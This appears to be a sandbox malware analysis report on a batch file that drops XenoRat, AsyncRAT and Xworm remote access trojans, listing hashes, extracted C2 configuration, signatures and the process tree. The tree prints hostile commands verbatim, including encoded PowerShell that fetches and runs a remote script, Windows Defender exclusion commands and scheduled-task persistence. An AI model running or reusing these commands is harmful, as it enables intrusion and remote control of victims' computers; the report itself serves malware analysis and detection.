Analysis
-
max time kernel
145s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
08-12-2024 12:53
General
-
Target
virus_src.bat
-
Size
720B
-
MD5
25cc17794b4a00de0db1dc2f14580af4
-
SHA1
f119d7d9bc38af460a8da42c9dbc09faa77130b1
-
SHA256
847d7d889d1d5dc33f7c24d82dccc71cb9032fd743e8a52364dc5e0a07a03e69
-
SHA512
70b49b9b7f7798f3ae15dfe100bf19eaf734de4c92b18b75295b06e455d64aee16879432ccfb3d95c78cbe301600504cfe485ddde59745dae62d64dd014b83ab
Malware Config
Extracted
xenorat
82.13.154.169
09f0agdksogvisd0gdsjpogijdsihg89t2374ygh23b5023gyd79srtdfgbalkfnmvsakfnsajdio32y8956tyhtijdesaiosahf85295u3497348huasnfjasfa86a7s6g70duhgfdaguh7dsa6gdayghdughuiagfad6ga760ghad8ga6gad75asfgagnhalkjs90436r7tgafhafyasuft7as5asf083y5
-
delay
5000
-
install_path
appdata
-
port
4444
-
startup_name
svchost
Extracted
asyncrat
CompPkgSrv
82.13.154.169:4444
-
delay
3
-
install
true
-
install_file
CompPkgSrv.exe
-
install_folder
%AppData%
Extracted
xworm
82.13.154.169:4444
-
Install_directory
%AppData%
-
install_file
CompPkgSup.exe
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
Detect XenoRat Payload 2 IoCs
-
Detect Xworm Payload 2 IoCs
-
XenorRat
XenorRat is a remote access trojan written in C#.
-
Xenorat family
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Async RAT payload 1 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 7 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies registry class 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 55 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\virus_src.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\virus_src.bat' -ArgumentList "am_admin"2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\virus_src.bat" am_admin3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQQBlAHYAaAB1AEgAdgBaACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAHMAeQBzAGIAbwBvAHQALgBwAHMAMQA=4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABzAHkAcwBiAG8AbwB0AC4AcABzADEADQAKAA==4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\sysboot.ps15⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\svchost.exe"C:\Users\Admin\AppData\Local\svchost.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "svchost" /XML "C:\Users\Admin\AppData\Local\Temp\tmpEE38.tmp" /F8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /query /v /fo csv8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /delete /tn "\svchost" /f8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 39⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Users\Admin\AppData\Local\CompPkgSrv.exe"C:\Users\Admin\AppData\Local\CompPkgSrv.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"' & exit7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"'8⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEE57.tmp.bat""7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 38⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\CompPkgSup.exe"C:\Users\Admin\AppData\Local\CompPkgSup.exe"6⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\CompPkgSup.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\CompPkgSup.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "CompPkgSup" /tr "C:\Users\Admin\AppData\Roaming\CompPkgSup.exe"7⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\CompPkgSup.exeC:\Users\Admin\AppData\Roaming\CompPkgSup.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\CompPkgSup.exeC:\Users\Admin\AppData\Roaming\CompPkgSup.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
63KB
MD5a2cc522bd3b0806748349c386d613b00
SHA136f14471d1e307eec0af563f5c884acbffe65284
SHA256a68a6d746ffbaf79d5e43b140217f521d68efa0191f9630258c57faf9591b70d
SHA512c5f108ecc7ef45b465f07f3441ad00682a9ef9caa25783af1acf00777e087e483071e323b311581ed94c3cbbf740b776a13f29374ef5c42f795e36a13c36c959
-
Filesize
80KB
MD582ae01d348fce7ddf9f19ca5cb545ae1
SHA15b563cec5b49c7ec4082bf19aeccce9fc190bd2a
SHA2564a322c3526936f921b75cadc7c2a827b8eeca29f6a929d9077751a3777ef378d
SHA5126a8ba6397c38661df7eda751a0340df08645da88e3b4a563d9ba9e3849b7332677ca4acf3c41235883d75b737c5b3a91c871c95dc87808f753fa85717338b1ea
-
Filesize
871B
MD5d58f949aad7df2e7b55248bfdfc6e1b8
SHA16713cad396b5808b66ede2dd9b169e00d5e5018f
SHA2565e1611e4d915fd9759825811fa4463f09172889f85889a2942be1561948fab8a
SHA512bdddb838108c4f3f0a7737703cbde935fe26aaea97459bb099c4c773c0789997283d7f20ac7ea4ac2aedef23515afc0b251b5b461aa12d3b7a60846b87b26e38
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
226B
MD5916851e072fbabc4796d8916c5131092
SHA1d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA2567e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA51207ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
944B
MD5ab7e6dde36eb8b844b32dd615e264171
SHA1aaa7b2d7e853d61e433880d0bd16c10b6d15875e
SHA2561c59354b551d1b8ee946968c4497fb23f2ceca41a14daa6f4f75313c40321376
SHA51207687eb560ca5a28466892fc37af90f0ce152d044937d814cef3a9334117aa0f351d68da36c5950f2737f785087d41eab748b1021532547a20c821bd0a504b46
-
Filesize
944B
MD53db1c0d23daacf01eb99125ccc2787d3
SHA10849528de1ba411279231d635d8f39d54cc829d2
SHA256bceb96f5c3d31447980eb8cd891bba75b3e5b6eb60abf4d829fc13cd8faf2582
SHA5123d84635a3395bca1d91ce182ccfb9e38c8da87ad678704673a72d580e4251cedc5a6b2a89040a172a5687b67952e74a13673bd115bce7bdabaed06f89323de5b
-
Filesize
944B
MD521bfc799247c23be8c83723a21d31bb5
SHA153b308a69a2e57ce004951c978ea8e008e29ca56
SHA256eab1228d3d5af575fdf617768fdd5371ca706e4f48a8f9f4583b58663fbc5be3
SHA51219e9ed32a3c302ea7d4ff23df4f6dfc7ba72775e18ce47f284db22f9059309448d77fd123984adcef11e647403a01f3cf45bd463857af77ae882be885001e746
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
1KB
MD52cd928baba5af07197e8ab4c3309ff7c
SHA1f282ff7f9323a5f5eab5479fd7c7e25776deac75
SHA25652638798f1f802fe7015092932c729461f2ba72fa3c906b443f7cedcc99f88c5
SHA512bea23897dd1f0a5aeb44f1197128e87bf1da2e5dad2d281425ed9b6bee0dd5e3b1898fe2e4eef659ed5a6bb13014ed57d3fd914e5b1247247d7fe2684fca69ef
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD59cb9f8ba5ba99c36d5ba7ee5a98f0bd9
SHA14bb53c5f5d4f208a4082b59b0c4b5185866cd874
SHA256dd802183599f6403ef3ae4832781d6fa687765b45a1d19d2fba947c41a51ee3c
SHA512eb8c9e078ba0b43d5256b7df4b4db16a45b954db118826b5629243025eeefa856e8c50d4451c13473290c2a707066c6bfa7173fc230daa13d87e7a4b7ec22f76
-
Filesize
154B
MD525d2c5e5395262d7fd8096ef7fc54914
SHA1f69bb678d6c3abfda0f45bce9a70ec78f790f75f
SHA256f107736f17456a0efe3ac696b0fe1f3408234ca2d9b448694710e4a0293d1a9e
SHA512eb466a1a7792c6369e633d49fb08ee3e3d1c4679325429bd33c1108e36ff1d3d4a69ad0b6544d6ad6424af8e23575efacc3b213b8aa948a1dd1f14fafd88906c
-
Filesize
46KB
MD531ee6e006c02625385210da20ce4b522
SHA1e13ae10bd9300fd4608f8fc697e789b9712c1a75
SHA25635edd93f3f9f6e21c6d88e50e475960290dacbba2c8d19cb74bb1b85fde24c2c
SHA51246aca18f2af78401b3d39c28b2d87de4d44c7661bbc4a129f0af840075ad2e2becf4d144fc98292efb909763543c64a4801f921c1b71232ac2cc4911224c77e4
-
Filesize
1KB
MD581f7df2e0aa206d331d8987c1035cef1
SHA151e8454a79b2f8127d96663c6a74f88b1f139f2a
SHA2564d2b4b4d6950791e6bcd8715c970bf7e19a0e33530818a6f17f602c785b0ec6a
SHA5126defa54b76c38545de4b3b031b25191ddf67ff5e95c7e0004305012d9c87c8ea6dde10e30f9d1caceb70ad7caef61063ddc6aec40c755be96b8e730d712b132d
-
Filesize
7.6MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
408KB
-
Filesize
104KB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
72KB
-
Filesize
88KB
-
Filesize
472KB
-
Filesize
272KB